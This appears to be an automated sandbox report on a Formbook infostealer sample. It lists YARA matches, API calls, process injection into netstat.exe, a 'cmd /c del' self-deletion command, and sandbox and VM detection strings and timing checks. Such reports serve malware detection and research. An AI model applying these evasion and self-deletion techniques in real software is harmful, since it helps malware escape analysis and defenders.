            Source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 034CB150 appears 35 times
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: String function: 0122B150 appears 35 times
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_004185C0 NtCreateFile,2_2_004185C0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_00418670 NtReadFile,2_2_00418670
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_004186F0 NtClose,2_2_004186F0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_004187A0 NtAllocateVirtualMemory,2_2_004187A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0041866E NtReadFile,2_2_0041866E
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0041879A NtAllocateVirtualMemory,2_2_0041879A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01269910
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012699A0 NtCreateSection,LdrInitializeThunk,2_2_012699A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01269860
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269840 NtDelayExecution,LdrInitializeThunk,2_2_01269840
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012698F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_012698F0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269A20 NtResumeThread,LdrInitializeThunk,2_2_01269A20
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01269A00
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269A50 NtCreateFile,LdrInitializeThunk,2_2_01269A50
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269540 NtReadFile,LdrInitializeThunk,2_2_01269540
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012695D0 NtClose,LdrInitializeThunk,2_2_012695D0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269710 NtQueryInformationToken,LdrInitializeThunk,2_2_01269710
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012697A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_012697A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269780 NtMapViewOfSection,LdrInitializeThunk,2_2_01269780
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269FE0 NtCreateMutant,LdrInitializeThunk,2_2_01269FE0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01269660
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012696E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_012696E0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269950 NtQueueApcThread,2_2_01269950
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012699D0 NtCreateProcessEx,2_2_012699D0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269820 NtEnumerateKey,2_2_01269820
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0126B040 NtSuspendThread,2_2_0126B040
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012698A0 NtWriteVirtualMemory,2_2_012698A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269B00 NtSetValueKey,2_2_01269B00
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0126A3B0 NtGetContextThread,2_2_0126A3B0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269A10 NtQuerySection,2_2_01269A10
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269A80 NtOpenDirectoryObject,2_2_01269A80
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269520 NtWaitForSingleObject,2_2_01269520
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0126AD30 NtSetContextThread,2_2_0126AD30
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269560 NtWriteFile,2_2_01269560
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012695F0 NtQueryInformationFile,2_2_012695F0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269730 NtQueryVirtualMemory,2_2_01269730
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0126A710 NtOpenProcessToken,2_2_0126A710
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269760 NtOpenProcess,2_2_01269760
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0126A770 NtOpenThread,2_2_0126A770
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269770 NtSetInformationFile,2_2_01269770
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269610 NtEnumerateValueKey,2_2_01269610
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269670 NtQueryInformationProcess,2_2_01269670
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01269650 NtQueryValueKey,2_2_01269650
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012696D0 NtCreateKey,2_2_012696D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509A50 NtCreateFile,LdrInitializeThunk,8_2_03509A50
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_03509910
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035099A0 NtCreateSection,LdrInitializeThunk,8_2_035099A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509840 NtDelayExecution,LdrInitializeThunk,8_2_03509840
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509860 NtQuerySystemInformation,LdrInitializeThunk,8_2_03509860
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509710 NtQueryInformationToken,LdrInitializeThunk,8_2_03509710
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509FE0 NtCreateMutant,LdrInitializeThunk,8_2_03509FE0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509780 NtMapViewOfSection,LdrInitializeThunk,8_2_03509780
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509650 NtQueryValueKey,LdrInitializeThunk,8_2_03509650
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03509660
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035096D0 NtCreateKey,LdrInitializeThunk,8_2_035096D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035096E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_035096E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509540 NtReadFile,LdrInitializeThunk,8_2_03509540
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035095D0 NtClose,LdrInitializeThunk,8_2_035095D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509B00 NtSetValueKey,8_2_03509B00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0350A3B0 NtGetContextThread,8_2_0350A3B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509A10 NtQuerySection,8_2_03509A10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509A00 NtProtectVirtualMemory,8_2_03509A00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509A20 NtResumeThread,8_2_03509A20
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509A80 NtOpenDirectoryObject,8_2_03509A80
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509950 NtQueueApcThread,8_2_03509950
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035099D0 NtCreateProcessEx,8_2_035099D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0350B040 NtSuspendThread,8_2_0350B040
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509820 NtEnumerateKey,8_2_03509820
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035098F0 NtReadVirtualMemory,8_2_035098F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035098A0 NtWriteVirtualMemory,8_2_035098A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0350A770 NtOpenThread,8_2_0350A770
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509770 NtSetInformationFile,8_2_03509770
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509760 NtOpenProcess,8_2_03509760
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0350A710 NtOpenProcessToken,8_2_0350A710
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509730 NtQueryVirtualMemory,8_2_03509730
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035097A0 NtUnmapViewOfSection,8_2_035097A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509670 NtQueryInformationProcess,8_2_03509670
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509610 NtEnumerateValueKey,8_2_03509610
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509560 NtWriteFile,8_2_03509560
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0350AD30 NtSetContextThread,8_2_0350AD30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509520 NtWaitForSingleObject,8_2_03509520
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035095F0 NtQueryInformationFile,8_2_035095F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FE86F0 NtClose,8_2_02FE86F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FE8670 NtReadFile,8_2_02FE8670
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FE87A0 NtAllocateVirtualMemory,8_2_02FE87A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FE85C0 NtCreateFile,8_2_02FE85C0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FE866E NtReadFile,8_2_02FE866E
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FE879A NtAllocateVirtualMemory,8_2_02FE879A
            Source: OApfyh3Vfm.exe, 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs OApfyh3Vfm.exe
            Source: OApfyh3Vfm.exe, 00000001.00000000.667285817.0000000000316000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSearchDa.exe> vs OApfyh3Vfm.exe
            Source: OApfyh3Vfm.exe, 00000002.00000000.675427339.00000000006A6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSearchDa.exe> vs OApfyh3Vfm.exe
            Source: OApfyh3Vfm.exe, 00000002.00000002.733597654.0000000000DCA000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs OApfyh3Vfm.exe
            Source: OApfyh3Vfm.exe, 00000002.00000002.734139678.000000000131F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs OApfyh3Vfm.exe
            Source: OApfyh3Vfm.exeBinary or memory string: OriginalFilenameSearchDa.exe> vs OApfyh3Vfm.exe
            Source: OApfyh3Vfm.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: OApfyh3Vfm.exeVirustotal: Detection: 48%
            Source: OApfyh3Vfm.exeMetadefender: Detection: 37%
            Source: OApfyh3Vfm.exeReversingLabs: Detection: 71%
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\OApfyh3Vfm.exe 'C:\Users\user\Desktop\OApfyh3Vfm.exe'
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess created: C:\Users\user\Desktop\OApfyh3Vfm.exe C:\Users\user\Desktop\OApfyh3Vfm.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\OApfyh3Vfm.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\OApfyh3Vfm.exe.log
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@19/7
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_01
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: OApfyh3Vfm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: OApfyh3Vfm.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: netstat.pdbGCTL source: OApfyh3Vfm.exe, 00000002.00000002.733597654.0000000000DCA000.00000004.00000020.sdmp
            Source: Binary string: netstat.pdb source: OApfyh3Vfm.exe, 00000002.00000002.733597654.0000000000DCA000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: OApfyh3Vfm.exe, 00000002.00000002.734139678.000000000131F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: OApfyh3Vfm.exe, NETSTAT.EXE

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: OApfyh3Vfm.exe, UX.WinForms/Form1.cs, .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.0.OApfyh3Vfm.exe.290000.0.unpack, UX.WinForms/Form1.cs, .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.2.OApfyh3Vfm.exe.290000.0.unpack, UX.WinForms/Form1.cs, .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.2.OApfyh3Vfm.exe.620000.1.unpack, UX.WinForms/Form1.cs, .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.0.OApfyh3Vfm.exe.620000.0.unpack, UX.WinForms/Form1.cs, .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Code function: 1_2_00294CCD push ds; retf 1_2_00294CCE
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Code function: 1_2_057561E8 push esp; iretd 1_2_057561E9
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Code function: 2_2_0041B86C push eax; ret 2_2_0041B872
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Code function: 2_2_0041B802 push eax; ret 2_2_0041B808
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Code function: 2_2_0041B80B push eax; ret 2_2_0041B872
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Code function: 2_2_0041D347 push dword ptr [FC8F742Eh]; ret 2_2_0041D380
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Code function: 2_2_0041A684 push edx; retf 2_2_0041A686
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Code function: 2_2_0041B7B5 push eax; ret 2_2_0041B808
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Code function: 2_2_00624CCD push ds; retf 2_2_00624CCE
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Code function: 2_2_0127D0D1 push ecx; ret 2_2_0127D0E4
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 8_2_0351D0D1 push ecx; ret 8_2_0351D0E4
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 8_2_02FED347 push dword ptr [FC8F742Eh]; ret 8_2_02FED380
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 8_2_02FEB86C push eax; ret 8_2_02FEB872
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 8_2_02FEB80B push eax; ret 8_2_02FEB872
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 8_2_02FEB802 push eax; ret 8_2_02FEB808
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 8_2_02FEA684 push edx; retf 8_2_02FEA686
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 8_2_02FEB7B5 push eax; ret 8_2_02FEB808
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 8_2_02FEBD72 push ds; iretd 8_2_02FEBD73
            Source: initial sample, Static PE information: section name: .text entropy: 7.19443434892

            Hooking and other Techniques for Hiding and Protection:

            Self deletion via cmd delete
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process created: /c del 'C:\Users\user\Desktop\OApfyh3Vfm.exe'
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara match, File source: 00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: OApfyh3Vfm.exe PID: 6332, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: OApfyh3Vfm.exe, 00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmp, Binary or memory string: SBIEDLL.DLL
            Source: OApfyh3Vfm.exe, 00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmp, Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, RDTSC instruction interceptor: First address: 0000000002FD8604 second address: 0000000002FD860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, RDTSC instruction interceptor: First address: 0000000002FD899E second address: 0000000002FD89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe TID: 6344, Thread sleep time: -33306s >= -30000s
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe TID: 6808, Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6012, Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 5912, Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\explorer.exe, Last function: Thread delayed
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, Last function: Thread delayed
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Code function: 2_2_004088D0 rdtsc 2_2_004088D0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Thread delayed: delay time: 33306
            Source: OApfyh3Vfm.exe, 00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmp, Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000003.00000000.687181210.000000000A60E000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: OApfyh3Vfm.exe, 00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmp, Binary or memory string: vmware
            Source: explorer.exe, 00000003.00000000.683446644.0000000006650000.00000004.00000001.sdmp, Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000003.00000000.680554884.0000000004710000.00000004.00000001.sdmp, Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000003.00000000.687471430.000000000A716000.00000004.00000001.sdmp, Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: OApfyh3Vfm.exe, 00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmp, Binary or memory string: VMware SVGA II
            Source: explorer.exe, 00000003.00000000.719000106.000000000A783000.00000004.00000001.sdmp, Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: OApfyh3Vfm.exe, 00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmp, Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process token adjusted: Debug
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01252581 mov eax, dword ptr fs:[00000030h]2_2_01252581
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01252581 mov eax, dword ptr fs:[00000030h]2_2_01252581
